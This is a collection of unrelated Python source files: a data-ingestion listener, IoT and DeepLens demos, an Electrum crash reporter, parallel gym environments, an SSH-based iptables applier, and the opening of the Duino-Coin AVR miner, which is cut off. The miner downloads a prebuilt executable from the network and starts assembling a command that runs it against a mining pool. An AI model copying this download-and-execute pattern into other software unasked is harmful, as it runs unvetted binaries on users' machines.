self.patch_ingestion_report(variant_builder.ingestion_report, uuid)
else:
self.set_status(uuid, STATUS_INGESTED)
discard(message)
# This is just fallback cleanup in case messages weren't cleaned up within the loop.
# In normal operation, they will be.
self.delete_messages(messages)
def run(vapp=None, _queue_manager=None, _update_status=None):
""" Entry-point for the ingestion listener for waitress. """
ingestion_listener = IngestionListener(vapp, _queue_manager=_queue_manager, _update_status=_update_status)
try:
ingestion_listener.run()
except Exception as e:
debuglog(str(e))
raise
class ErrorHandlingThread(threading.Thread):
""" Must be duplicated here so logging is correct. """
def run(self):
# interval = self._kwargs.get('interval', DEFAULT_INTERVAL)
interval = 60 # DB polling can and should be slower
update_status = self._kwargs['_update_status'] # noQA - uses private instance variables of parent class
while True:
try:
self._target(*self._args, **self._kwargs) # noQA - uses private instance variables of parent class
except (psycopg2.OperationalError, elasticsearch.exceptions.ConnectionError) as e:
# Handle database restart
log.warning('Database not there, maybe starting up: %r', e)
update_status(msg=repr(e))
log.debug('sleeping')
time.sleep(interval)
continue
except Exception as e:
# Unfortunately mod_wsgi does not restart immediately
log.exception('Exception in ingestion listener, restarting process at next request: %s' % e)
os.kill(os.getpid(), signal.SIGINT)
break
# Composite Application (for wsgi)
def composite(loader, global_conf, **settings):
""" This is a composite pyramid app, meant to run components of an application
or an application extension. In our case we are running the ingestion listener,
which requires executing a command with application context. This code lives
in encoded top-level as it is a wsgi entry-point. Note that the local deployment
does NOT run the listener this way, but runs the run method through main directly.
This code is heavily based off of the es_index_listener in snovault.
"""
listener = None
# Register before app creation.
@atexit.register
def join_listener():
if listener:
log.debug('joining listening thread')
listener.join()
# Composite app is used so we can load the main app
app_name = settings.get('app', None)
app = loader.get_app(app_name, global_conf=global_conf)
username = settings.get('username', 'IMPORT')
environ = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': username,
}
vapp = VirtualApp(app, environ)
timestamp = datetime.datetime.utcnow().isoformat()
status_holder = {
'status': {
'status': 'starting listener',
'started': timestamp,
'msgs': []
},
}
def update_status(msg=None, **kw):
""" Method passed to run to update "global" status. """
# Setting a value in a dictionary is atomic
status = status_holder['status'].copy()
status.update(**kw) # can hold generic info
if msg is not None:
status['msgs'].append(msg)
status_holder['status'] = status
kwargs = {
'vapp': vapp,
'_update_status': update_status
}
# daemon thread that actually executes `run` method to call /index
listener = ErrorHandlingThread(target=run, name='listener', kwargs=kwargs)
listener.daemon = True
log.debug('WSGI Ingestion Listener Started')
listener.start()
# Register after virtualapp creation.
@atexit.register
def shutdown_listener():
""" Echo a statement at shutdown """
log.debug('shutting down listening thread')
def status_app(environ, start_response):
""" Allows you to get the status of the ingestion "manager". This will be much
more useful once multi-processing is thrown at ingestion.
"""
ignored(environ)
status = '200 OK'
response_headers = [('Content-type', 'application/json')]
start_response(status, response_headers)
return [json.dumps(status_holder['status'])]
return status_app
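# Illustrative deployment sketch (not part of the original module): the composite()
# factory above would typically be wired up from a paste .ini file, roughly like the
# fragment below. The egg name and the target app section are placeholders; only the
# 'app' and 'username' settings correspond to what composite() actually reads.
#
#   [composite:ingestion-listener]
#   use = egg:encoded#ingestion-listener
#   app = app
#   username = IMPORT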
# Command Application (for waitress)
def main():
""" Entry point for the local deployment. """
parser = argparse.ArgumentParser( # noqa - PyCharm wrongly thinks the formatter_class is specified wrong here.
description='Listen for VCF File uuids to ingest',
epilog=EPILOG,
formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument('--app-name', help='Pyramid app name in configfile')
parser.add_argument('--username', '-u', default='IMPORT', help='Import username')
parser.add_argument('--dry-run', action='store_true', help='Do not post variants, just validate')
parser.add_argument('config_uri', help="path to configfile")
args = parser.parse_args()
app = paster.get_app(args.config_uri, args.app_name)
config = {
'HTTP_ACCEPT': 'application/json',
'REMOTE_USER': args.username,
}
vapp = VirtualApp(app, config)
return run(vapp)
if __name__ == '__main__':
main()
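# Illustrative local invocation (not from the original source); only the flag names
# come from the argparse setup in main() above, the file and app names are placeholders:
#
#   python ingestion_listener.py production.ini --app-name app --username IMPORT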
|
atomos_demo.py
|
# coding: utf-8
import sys
import os
sys.path.append(os.getcwd())
from Morphe.Atomos import Atomos
from Morphe.Morphe import Morphe
import asyncio
import time
import threading
import queue
import functools
def get_from_atomos(q):
count = 0
while True:
count += 1
data = q.get()
print("{}: get_from_atomos Got: ".format(count), data)
q = queue.Queue()
main = threading.Thread(target=functools.partial(get_from_atomos, q))
main.start()
print("Main 开启")
t = list()
for i in range(0, 10000):
t.append(i)
# Create data source a1
a1 = Atomos([{"time": t[i]} for i in range(0, 1000, 1)], name="List", buffer_size=10000)
# Create data source a2, which subscribes to a1; a2 is the terminal stage, and its async results are synced to queue q
a2 = Atomos(a1, sync_queue=q, name="Atomos", buffer_size=10)
a2.start()
main.join()
|
greengrassHelloWorld.py
|
print("Started Lambda")
import awscam
import mo
import cv2
from datetime import datetime
import json
from SimpleWebSocketServer import SimpleWebSocketServer, WebSocket
import sys
from threading import Thread, Timer
from base64 import b64encode
clients = []
class ResultsServer(WebSocket):
def handleConnected(self):
print(self.address, 'connected')
clients.append(self)
def handleClose(self):
clients.remove(self)
print(self.address, 'closed')
try:
results_server = SimpleWebSocketServer('', 8080, ResultsServer)
t = Thread(target=results_server.serveforever)
t.start()
print("Started websocket server")
except:
print("error", sys.exc_info()[0])
def greengrass_infinite_infer_run():
try:
global clients
input_width = 224
input_height = 224
model_name = "image-classification"
error, model_path = mo.optimize(model_name, input_width, input_height)
if error:
            print(error)
raise Exception(error)
print("Optimized model")
model = awscam.Model(model_path, {"GPU": 1})
print("Loaded model")
model_type = "classification"
labels = ['a','b','c','d','e','f','g','h','i','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','not']
topk = 1
while True:
start = datetime.now()
ret, frame = awscam.getLastFrame()
if ret == False:
raise Exception("Failed to get frame from the stream")
height, width, channels = frame.shape
            frame_cropped = frame[0:height, (width-height)//2:width-(width-height)//2]
frame_resize = cv2.resize(frame_cropped, (input_width, input_height))
infer_output = model.doInference(frame_resize)
parsed_results = model.parseResult(model_type, infer_output)
top_k = parsed_results[model_type][0:topk]
ret, jpeg = cv2.imencode(".jpg", frame_resize)
try:
end = datetime.now()
top_k[0]["label"] = labels[top_k[0]["label"]];
top_k[0]["jpeg"] = b64encode(jpeg)
top_k[0]["delay"] = (end - start).microseconds / 1000
msg = json.dumps(top_k[0]) + u''
for client in clients:
client.sendMessage(msg)
except:
print("error", sys.exc_info()[0])
except Exception as e:
print("Lambda failed: " + str(e))
# Asynchronously schedule this function to be run again in 15 seconds
Timer(15, greengrass_infinite_infer_run).start()
# Execute the function above
greengrass_infinite_infer_run()
# This is a dummy handler and will not be invoked
# Instead the code above will be executed in an infinite loop for our example
def function_handler(event, context):
return
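# Reference note (added summary, hedged): each message sent to the websocket clients
# above is json.dumps() of the top classification result, after the loop attaches a
# human-readable "label", a base64 "jpeg" of the frame, and the inference "delay" in ms.
# Any other keys (such as the raw probability) depend on what model.parseResult()
# returns for this model.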
|
iot-hub-client-message.py
|
import json
import random
import re
import sys
import threading
import time
from azure.iot.device import IoTHubDeviceClient, Message
AUX_CONNECTION_STRING = sys.argv[1]
AUX_BASE_HEART_RATE = 65
AUX_BASE_BODY_TEMPERATURE = 37.0
AUX_MAXIMUM_BODY_TEMPERATURE = 40.0
#SENSOR DATA WILL HOST SENSOR METRICS
sensor_data = {}
#MESSAGE FOR RECEIVING DATA FROM IoT HUB. THIS METHOD WILL BE CALLED BY THE RECEPTION THREAD
def message_listener(client):
while True:
message = client.receive_message()
print("Message received")
print( " Data: {}".format(message.data.decode("utf-8") ) )
print( " Properties: {}".format(message.custom_properties))
#METHOD FOR ONE METRIC
def get_sensor_temperature():
temperature = AUX_BASE_BODY_TEMPERATURE + (random.random() * random.random() * 5)
return temperature
#METHOD FOR ONE METRIC
def get_sensor_heart_rate():
heart_rate = AUX_BASE_HEART_RATE + (random.random() * random.random() * 15)
return heart_rate
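#ILLUSTRATIVE SKETCH (NOT PART OF THE ORIGINAL SAMPLE): THE TWO SENSOR METHODS ABOVE
#COULD POPULATE sensor_data AND BE SENT AS TELEMETRY WITH THE IMPORTED Message CLASS, E.G.:
# sensor_data['bodyTemperature'] = get_sensor_temperature()
# sensor_data['heartRate'] = get_sensor_heart_rate()
# client.send_message(Message(json.dumps(sensor_data)))
#THE FIELD NAMES HERE ARE ASSUMPTIONS; AS WRITTEN, THIS SCRIPT ONLY RECEIVES MESSAGES.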
def aux_validate_connection_string():
if not AUX_CONNECTION_STRING.startswith( 'HostName=' ):
print ("ERROR - YOUR IoT HUB CONNECTION STRING IS NOT VALID")
print ("FORMAT - HostName=your_iot_hub_name.azure-devices.net;DeviceId=your_device_name;SharedAccessKey=your_shared_access_key")
sys.exit()
def aux_iothub_client_init():
client = IoTHubDeviceClient.create_from_connection_string(AUX_CONNECTION_STRING)
return client
def iothub_client_telemetry_sample_run():
try:
aux_validate_connection_string()
client = aux_iothub_client_init()
print ( "IoT Hub Message receiver" )
print ( "Press Ctrl-C to exit" )
#ENABLE THE RECEPTION THREAD, DEFINING THE TARGET METHOD
message_listener_thread = threading.Thread(target=message_listener, args=(client,))
message_listener_thread.daemon = True
message_listener_thread.start()
#IT WILL RUN FOREVER UNLESS YOU STOP IT
while True:
time.sleep(1000)
except KeyboardInterrupt:
print ( "IoTHubClient sample stopped" )
if __name__ == '__main__':
iothub_client_telemetry_sample_run()
|
base_crash_reporter.py
|
# Electrum - lightweight Bitcoin client
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import json
import locale
import traceback
import subprocess
import sys
import os
from .version import ELECTRUM_VERSION
from . import constants
from .i18n import _
from .util import make_aiohttp_session
from .logging import describe_os_version, Logger
class BaseCrashReporter(Logger):
report_server = "https://electrum.crashhub.qtum.site"
config_key = "show_crash_reporter"
issue_template = """<h2>Traceback</h2>
<pre>
{traceback}
</pre>
<h2>Additional information</h2>
<ul>
<li>Electrum version: {app_version}</li>
<li>Python version: {python_version}</li>
<li>Operating system: {os}</li>
<li>Wallet type: {wallet_type}</li>
<li>Locale: {locale}</li>
</ul>
"""
CRASH_MESSAGE = _('Something went wrong while executing Electrum.')
CRASH_TITLE = _('Sorry!')
REQUEST_HELP_MESSAGE = _('To help us diagnose and fix the problem, you can send us a bug report that contains '
'useful debug information:')
DESCRIBE_ERROR_MESSAGE = _("Please briefly describe what led to the error (optional):")
ASK_CONFIRM_SEND = _("Do you want to send this report?")
def __init__(self, exctype, value, tb):
Logger.__init__(self)
self.exc_args = (exctype, value, tb)
def send_report(self, asyncio_loop, proxy, endpoint="/crash", *, timeout=None):
if constants.net.GENESIS[-4:] not in ["986c", "4222"] and ".qtum.site" in BaseCrashReporter.report_server:
# Gah! Some kind of altcoin wants to send us crash reports.
raise Exception(_("Missing report URL."))
report = self.get_traceback_info()
report.update(self.get_additional_info())
report = json.dumps(report)
coro = self.do_post(proxy, BaseCrashReporter.report_server + endpoint, data=report)
response = asyncio.run_coroutine_threadsafe(coro, asyncio_loop).result(timeout)
return response
async def do_post(self, proxy, url, data):
async with make_aiohttp_session(proxy) as session:
async with session.post(url, data=data) as resp:
return await resp.text()
def get_traceback_info(self):
exc_string = str(self.exc_args[1])
stack = traceback.extract_tb(self.exc_args[2])
readable_trace = "".join(traceback.format_list(stack))
id = {
"file": stack[-1].filename,
"name": stack[-1].name,
"type": self.exc_args[0].__name__
}
return {
"exc_string": exc_string,
"stack": readable_trace,
"id": id
}
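    # Illustrative shape of the dict returned above (all values made up):
    #   {"exc_string": "division by zero",
    #    "stack": "  File \"wallet.py\", line 1, in make_tx\n    ...",
    #    "id": {"file": "wallet.py", "name": "make_tx", "type": "ZeroDivisionError"}}
    # The "id" entry presumably lets the report server group similar crashes together.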
def get_additional_info(self):
args = {
"app_version": ELECTRUM_VERSION,
"python_version": sys.version,
"os": describe_os_version(),
"wallet_type": "unknown",
"locale": locale.getdefaultlocale()[0] or "?",
"description": self.get_user_description()
}
try:
args["wallet_type"] = self.get_wallet_type()
except:
# Maybe the wallet isn't loaded yet
pass
try:
args["app_version"] = self.get_git_version()
except:
# This is probably not running from source
pass
return args
@staticmethod
def get_git_version():
dir = os.path.dirname(os.path.realpath(sys.argv[0]))
version = subprocess.check_output(
['git', 'describe', '--always', '--dirty'], cwd=dir)
return str(version, "utf8").strip()
def get_report_string(self):
info = self.get_additional_info()
info["traceback"] = "".join(traceback.format_exception(*self.exc_args))
return self.issue_template.format(**info)
def get_user_description(self):
raise NotImplementedError
def get_wallet_type(self):
raise NotImplementedError
def trigger_crash():
# note: do not change the type of the exception, the message,
# or the name of this method. All reports generated through this
# method will be grouped together by the crash reporter, and thus
# don't spam the issue tracker.
class TestingException(Exception):
pass
def crash_test():
raise TestingException("triggered crash for testing purposes")
import threading
t = threading.Thread(target=crash_test)
t.start()
|
parallel_environments.py
|
import multiprocessing
import gym
import torch
from multiprocessing import Process, Pipe
from actor_critic.environment_wrapper import EnvironmentWrapper
def worker(connection, stack_size):
env = make_environment(stack_size)
while True:
command, data = connection.recv()
if command == 'step':
state, reward, done = env.step(data)
if done:
state = env.reset()
connection.send((state, reward, done))
elif command == 'reset':
state = env.reset()
connection.send(state)
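# Added summary: each worker speaks a small two-command protocol over its end of the
# Pipe. The parent sends ('step', action) and receives (state, reward, done), or sends
# ('reset', None) and receives the initial state, e.g. (illustrative):
#   parent.send(('step', action)); state, reward, done = parent.recv()
# ParallelEnvironments below drives this protocol across all worker processes.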
def make_environment(stack_size):
env = gym.make('CarRacing-v0')
env_wrapper = EnvironmentWrapper(env, stack_size)
return env_wrapper
class ParallelEnvironments:
def __init__(self, stack_size, number_of_processes=multiprocessing.cpu_count()):
self.number_of_processes = number_of_processes
self.stack_size = stack_size
# pairs of connections in duplex connection
self.parents, self.childs = zip(*[Pipe() for _
in range(number_of_processes)])
self.processes = [Process(target=worker, args=(child, self.stack_size,), daemon=True)
for child in self.childs]
for process in self.processes:
process.start()
def step(self, actions):
for action, parent in zip(actions, self.parents):
parent.send(('step', action))
results = [parent.recv() for parent in self.parents]
states, rewards, dones = zip(*results)
return torch.Tensor(states), torch.Tensor(rewards), torch.Tensor(dones)
def reset(self):
for parent in self.parents:
parent.send(('reset', None))
results = [parent.recv() for parent in self.parents]
return torch.Tensor(results)
def get_state_shape(self):
return (self.stack_size, 84, 84)
if __name__ == '__main__':
    env = ParallelEnvironments(4, number_of_processes=2)  # stack size of 4 assumed here; the original referenced an undefined 'params'
random_env = gym.make('CarRacing-v0')
res = env.reset()
for i in range(1000):
ac = random_env.action_space.sample()
actions = [ac, ac]
results = env.step(actions)
if torch.all(torch.eq(torch.Tensor(results[0][0][0]), torch.Tensor(results[0][1][0]))):
print(i)
# actions = [[0, 0, 0], [0, 0, 0]]
# env.step(actions)
|
apply-firewall.py
|
#!/usr/bin/env python
"""
Apply a "Security Group" to the members of an etcd cluster.
Usage: apply-firewall.py
"""
import os
import re
import string
import argparse
from threading import Thread
import uuid
import colorama
from colorama import Fore, Style
import paramiko
import requests
import sys
import yaml
def get_nodes_from_args(args):
if args.discovery_url is not None:
return get_nodes_from_discovery_url(args.discovery_url)
return get_nodes_from_discovery_url(get_discovery_url_from_user_data())
def get_nodes_from_discovery_url(discovery_url):
try:
nodes = []
json = requests.get(discovery_url).json()
discovery_nodes = json['node']['nodes']
for node in discovery_nodes:
value = node['value']
ip = re.search('([0-9]{1,3}\.){3}[0-9]{1,3}', value).group(0)
nodes.append(ip)
return nodes
except:
raise IOError('Could not load nodes from discovery url ' + discovery_url)
def get_discovery_url_from_user_data():
name = 'linode-user-data.yaml'
log_info('Loading discovery url from ' + name)
try:
current_dir = os.path.dirname(__file__)
user_data_file = file(os.path.abspath(os.path.join(current_dir, name)), 'r')
user_data_yaml = yaml.safe_load(user_data_file)
return user_data_yaml['coreos']['etcd2']['discovery']
except:
raise IOError('Could not load discovery url from ' + name)
def validate_ip_address(ip):
return True if re.match('([0-9]{1,3}\.){3}[0-9]{1,3}', ip) else False
def get_firewall_contents(node_ips, private=False):
rules_template_text = """*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
:DOCKER - [0:0]
:Firewall-INPUT - [0:0]
-A INPUT -j Firewall-INPUT
-A FORWARD -j Firewall-INPUT
-A Firewall-INPUT -i lo -j ACCEPT
-A Firewall-INPUT -p icmp --icmp-type echo-reply -j ACCEPT
-A Firewall-INPUT -p icmp --icmp-type destination-unreachable -j ACCEPT
-A Firewall-INPUT -p icmp --icmp-type time-exceeded -j ACCEPT
# Ping
-A Firewall-INPUT -p icmp --icmp-type echo-request -j ACCEPT
# Accept any established connections
-A Firewall-INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
# Enable the traffic between the nodes of the cluster
-A Firewall-INPUT -s $node_ips -j ACCEPT
# Allow connections from docker container
-A Firewall-INPUT -i docker0 -j ACCEPT
# Accept ssh, http, https and git
-A Firewall-INPUT -m conntrack --ctstate NEW -m multiport$multiport_private -p tcp --dports 22,2222,80,443 -j ACCEPT
# Log and drop everything else
-A Firewall-INPUT -j REJECT
COMMIT
"""
multiport_private = ' -s 192.168.0.0/16' if private else ''
rules_template = string.Template(rules_template_text)
return rules_template.substitute(node_ips=string.join(node_ips, ','), multiport_private=multiport_private)
def apply_rules_to_all(host_ips, rules, private_key):
pkey = detect_and_create_private_key(private_key)
threads = []
for ip in host_ips:
t = Thread(target=apply_rules, args=(ip, rules, pkey))
t.setDaemon(False)
t.start()
threads.append(t)
for thread in threads:
thread.join()
def detect_and_create_private_key(private_key):
private_key_text = private_key.read()
private_key.seek(0)
if '-----BEGIN RSA PRIVATE KEY-----' in private_key_text:
return paramiko.RSAKey.from_private_key(private_key)
elif '-----BEGIN DSA PRIVATE KEY-----' in private_key_text:
return paramiko.DSSKey.from_private_key(private_key)
else:
raise ValueError('Invalid private key file ' + private_key.name)
def apply_rules(host_ip, rules, private_key):
# connect to the server via ssh
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(host_ip, username='core', allow_agent=False, look_for_keys=False, pkey=private_key)
# copy the rules to the temp directory
temp_file = '/tmp/' + str(uuid.uuid4())
    sftp = ssh.open_sftp()
sftp.open(temp_file, 'w').write(rules)
# move the rules in to place and enable and run the iptables-restore.service
commands = [
'sudo mv ' + temp_file + ' /var/lib/iptables/rules-save',
'sudo chown root:root /var/lib/iptables/rules-save',
'sudo systemctl enable iptables-restore.service',
'sudo systemctl start iptables-restore.service'
]
for command in commands:
stdin, stdout, stderr = ssh.exec_command(command)
stdout.channel.recv_exit_status()
ssh.close()
log_success('Applied rule to ' + host_ip)
def main():
colorama.init()
parser = argparse.ArgumentParser(description='Apply a "Security Group" to a Deis cluster')
parser.add_argument('--private-key', required=True, type=file, dest='private_key', help='Cluster SSH Private Key')
parser.add_argument('--private', action='store_true', dest='private', help='Only allow access to the cluster from the private network')
parser.add_argument('--discovery-url', dest='discovery_url', help='Etcd discovery url')
parser.add_argument('--hosts', nargs='+', dest='hosts', help='The IP addresses of the hosts to apply rules to')
args = parser.parse_args()
nodes = get_nodes_from_args(args)
hosts = args.hosts if args.hosts is not None else nodes
node_ips = []
for ip in nodes:
if validate_ip_address(ip):
node_ips.append(ip)
else:
log_warning('Invalid IP will not be added to security group: ' + ip)
if not len(node_ips) > 0:
raise ValueError('No valid IP addresses in security group.')
host_ips = []
for ip in hosts:
if validate_ip_address(ip):
host_ips.append(ip)
else:
log_warning('Host has invalid IP address: ' + ip)
if not len(host_ips) > 0:
raise ValueError('No valid host addresses.')
log_info('Generating iptables rules...')
rules = get_firewall_contents(node_ips, args.private)
log_success('Generated rules:')
log_debug(rules)
log_info('Applying rules...')
apply_rules_to_all(host_ips, rules, args.private_key)
log_success('Done!')
def log_debug(message):
print(Style.DIM + Fore.MAGENTA + message + Fore.RESET + Style.RESET_ALL)
def log_info(message):
print(Fore.CYAN + message + Fore.RESET)
def log_warning(message):
print(Fore.YELLOW + message + Fore.RESET)
def log_success(message):
print(Style.BRIGHT + Fore.GREEN + message + Fore.RESET + Style.RESET_ALL)
def log_error(message):
print(Style.BRIGHT + Fore.RED + message + Fore.RESET + Style.RESET_ALL)
if __name__ == "__main__":
try:
main()
except Exception as e:
log_error(e.message)
sys.exit(1)
|
AVR_Miner.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin AVR Miner (v2.2)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2021
##########################################
import socket, threading, time, re, subprocess, configparser, sys, datetime, os, json # Import libraries
from pathlib import Path
from signal import signal, SIGINT
def install(package):
subprocess.check_call([sys.executable, "-m", "pip", "install", package])
os.execl(sys.executable, sys.executable, *sys.argv)
def now():
return datetime.datetime.now()
try: # Check if pyserial is installed
import serial
import serial.tools.list_ports
except:
print(
now().strftime("%H:%M:%S ")
+ 'Pyserial is not installed. Miner will try to install it. If it fails, please manually install "pyserial" python3 package.\nIf you can\'t install it, use the Minimal-PC_Miner.'
)
install("pyserial")
try: # Check if colorama is installed
from colorama import init, Fore, Back, Style
except:
print(
now().strftime("%H:%M:%S ")
+ 'Colorama is not installed. Miner will try to install it. If it fails, please manually install "colorama" python3 package.\nIf you can\'t install it, use the Minimal-PC_Miner.'
)
install("colorama")
try: # Check if requests is installed
import requests
except:
print(
now().strftime("%H:%M:%S ")
+ 'Requests is not installed. Miner will try to install it. If it fails, please manually install "requests" python3 package.\nIf you can\'t install it, use the Minimal-PC_Miner.'
)
install("requests")
try:
from pypresence import Presence
except:
print(
'Pypresence is not installed. Wallet will try to install it. If it fails, please manually install "pypresence" python3 package.'
)
install("pypresence")
# Global variables
minerVersion = "2.2" # Version number
timeout = 30 # Socket timeout
resourcesFolder = "AVRMiner_" + str(minerVersion) + "_resources"
shares = [0, 0]
diff = 0
donatorrunning = False
job = ""
debug = "n"
rigIdentifier = "None"
serveripfile = "https://raw.githubusercontent.com/revoxhere/duino-coin/gh-pages/serverip.txt" # Serverip file
config = configparser.ConfigParser()
donationlevel = 0
hashrate = 0
connectionMessageShown = False
if not os.path.exists(resourcesFolder):
os.mkdir(resourcesFolder) # Create resources folder if it doesn't exist
def debugOutput(text):
if debug == "y":
print(
now().strftime(Style.RESET_ALL + Style.DIM + "%H:%M:%S.%f ")
+ "DEBUG: "
+ text
)
def title(title):
if os.name == "nt":
os.system("title " + title)
else:
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def handler(
signal_received, frame
): # If CTRL+C or SIGINT received, send CLOSE request to server in order to exit gracefully.
print(
now().strftime(Style.RESET_ALL + Style.DIM + "\n%H:%M:%S ")
+ Style.BRIGHT
+ Back.GREEN
+ Fore.WHITE
+ " sys0 "
+ Back.RESET
+ Fore.YELLOW
+ " SIGINT detected - Exiting gracefully."
+ Style.NORMAL
+ Fore.WHITE
+ " See you soon!"
)
try:
soc.close()
except:
pass
os._exit(0)
signal(SIGINT, handler) # Enable signal handler
def loadConfig(): # Config loading section
global pool_address, pool_port, username, donationlevel, avrport, debug, requestedDiff, rigIdentifier
if not Path(
str(resourcesFolder) + "/Miner_config.cfg"
).is_file(): # Initial configuration section
print(
Style.BRIGHT
+ "\nDuino-Coin basic configuration tool\nEdit "
+ str(resourcesFolder)
+ "/Miner_config.cfg file later if you want to change it."
)
print(
Style.RESET_ALL
+ "Don't have an Duino-Coin account yet? Use "
+ Fore.YELLOW
+ "Wallet"
+ Fore.WHITE
+ " to register on server.\n"
)
username = input(
Style.RESET_ALL
+ Fore.YELLOW
+ "Enter your Duino-Coin username: "
+ Style.BRIGHT
)
print(
Style.RESET_ALL
+ Fore.YELLOW
+ "Configuration tool has found the following ports:"
)
portlist = serial.tools.list_ports.comports()
for port in portlist:
print(Style.RESET_ALL + Style.BRIGHT + Fore.YELLOW + " " + str(port))
print(
Style.RESET_ALL
+ Fore.YELLOW
+ "If you can't see your board here, make sure the it is properly connected and the program has access to it (admin/sudo rights)."
)
avrport = ""
while True:
avrport += input(
Style.RESET_ALL
+ Fore.YELLOW
+ "Enter your board serial port (e.g. COM1 (Windows) or /dev/ttyUSB1 (Unix)): "
+ Style.BRIGHT
)
confirmation = input(
Style.RESET_ALL
+ Fore.YELLOW
+ "Do you want to add another board? (y/N): "
+ Style.BRIGHT
)
if confirmation == "y" or confirmation == "Y":
avrport += ","
else:
break
requestedDiffSelection = input(
Style.RESET_ALL
+ Fore.YELLOW
+ "Do you want to use a higher difficulty (only for Arduino DUE boards) (y/N): "
+ Style.BRIGHT
)
if requestedDiffSelection == "y" or requestedDiffSelection == "Y":
requestedDiff = "ESP32"
else:
requestedDiff = "AVR"
rigIdentifier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ "Do you want to add an identifier (name) to this rig? (y/N) "
+ Style.BRIGHT
)
if rigIdentifier == "y" or rigIdentifier == "Y":
rigIdentifier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ "Enter desired rig name: "
+ Style.BRIGHT
)
else:
rigIdentifier = "None"
donationlevel = "0"
if os.name == "nt" or os.name == "posix":
donationlevel = input(
Style.RESET_ALL
+ Fore.YELLOW
+ "Set developer donation level (0-5) (recommended: 1), this will not reduce your earnings: "
+ Style.BRIGHT
)
donationlevel = re.sub(
"\D", "", donationlevel
            ) # Check whether donationlevel is correct
if float(donationlevel) > int(5):
donationlevel = 5
if float(donationlevel) < int(0):
donationlevel = 0
config["arduminer"] = { # Format data
"username": username,
"avrport": avrport,
"donate": donationlevel,
"debug": "n",
"identifier": rigIdentifier,
"difficulty": requestedDiff,
}
with open(
str(resourcesFolder) + "/Miner_config.cfg", "w"
) as configfile: # Write data to file
config.write(configfile)
avrport = avrport.split(",")
print(Style.RESET_ALL + "Config saved! Launching the miner")
else: # If config already exists, load from it
config.read(str(resourcesFolder) + "/Miner_config.cfg")
username = config["arduminer"]["username"]
avrport = config["arduminer"]["avrport"]
avrport = avrport.split(",")
donationlevel = config["arduminer"]["donate"]
debug = config["arduminer"]["debug"]
rigIdentifier = config["arduminer"]["identifier"]
requestedDiff = config["arduminer"]["difficulty"]
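# For reference (illustrative, values are placeholders): the Miner_config.cfg file
# written and read by loadConfig() above is a plain INI file along these lines:
#   [arduminer]
#   username = my_duco_user
#   avrport = COM3,COM4
#   donate = 1
#   debug = n
#   identifier = None
#   difficulty = AVR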
def Greeting(): # Greeting message depending on time
global greeting
print(Style.RESET_ALL)
current_hour = time.strptime(time.ctime(time.time())).tm_hour
if current_hour < 12:
greeting = "Have a wonderful morning"
elif current_hour == 12:
greeting = "Have a tasty noon"
elif current_hour > 12 and current_hour < 18:
greeting = "Have a peaceful afternoon"
elif current_hour >= 18:
greeting = "Have a cozy evening"
else:
greeting = "Welcome back"
print(
" > "
+ Fore.YELLOW
+ Style.BRIGHT
+ "Official Duino-Coin © AVR Miner"
+ Style.RESET_ALL
+ Fore.WHITE
+ " (v"
+ str(minerVersion)
+ ") 2019-2021"
) # Startup message
print(" > " + Fore.YELLOW + "https://github.com/revoxhere/duino-coin")
print(
" > "
+ Fore.WHITE
+ "AVR board(s) on port(s): "
+ Style.BRIGHT
+ Fore.YELLOW
+ " ".join(avrport)
)
if os.name == "nt" or os.name == "posix":
print(
" > "
+ Fore.WHITE
+ "Donation level: "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(donationlevel)
)
print(
" > "
+ Fore.WHITE
+ "Algorithm: "
+ Style.BRIGHT
+ Fore.YELLOW
+ "DUCO-S1A @ "
+ str(requestedDiff)
+ " diff"
)
print(
Style.RESET_ALL
+ " > "
+ Fore.WHITE
+ "Rig identifier: "
+ Style.BRIGHT
+ Fore.YELLOW
+ rigIdentifier
)
print(
" > "
+ Fore.WHITE
+ str(greeting)
+ ", "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(username)
+ "!\n"
)
if os.name == "nt":
if not Path(
resourcesFolder + "/Donate_executable.exe"
).is_file(): # Initial miner executable section
debugOutput("OS is Windows, downloading developer donation executable")
url = "https://github.com/revoxhere/duino-coin/blob/useful-tools/DonateExecutableWindows.exe?raw=true"
r = requests.get(url)
with open(resourcesFolder + "/Donate_executable.exe", "wb") as f:
f.write(r.content)
elif os.name == "posix":
if not Path(
resourcesFolder + "/Donate_executable"
).is_file(): # Initial miner executable section
debugOutput("OS is Windows, downloading developer donation executable")
url = "https://github.com/revoxhere/duino-coin/blob/useful-tools/DonateExecutableLinux?raw=true"
r = requests.get(url)
with open(resourcesFolder + "/Donate_executable", "wb") as f:
f.write(r.content)
def Donate():
global donationlevel, donatorrunning, donateExecutable
if os.name == "nt":
cmd = (
"cd "
+ resourcesFolder
+ "& Donate_executable.exe -o stratum+tcp://blockmasters.co:6033 -u 9RTb3ikRrWExsF6fis85g7vKqU1tQYVFuR -p AVRmW,c=XMG,d=16 -s 4 -e "
)
